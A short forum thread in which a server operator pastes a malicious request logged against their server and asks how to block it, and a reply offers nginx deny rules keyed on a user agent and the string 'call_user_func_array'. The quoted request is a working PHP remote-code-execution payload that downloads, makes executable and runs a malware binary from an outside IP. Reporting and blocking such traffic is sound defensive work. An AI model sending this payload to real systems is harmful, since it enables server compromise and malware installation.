scrips crawling my servers

[mincaeuro]

Hi,

was wondering if you have experience with such requests:

/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86'

• is it possible to "auto-ban" such IPs ?

[Zasimovich]

You can reject this attack by nginx rules:

location / { if ($http_user_agent ~ (tsunami) ) { return 403; } if ($query_string ~ "call_user_func_array" ) { return 403; } ... }

Link https://serverfault.com/questions/957075/block-remote-code-execution-ubuntu-server-fail2ban-cloudflare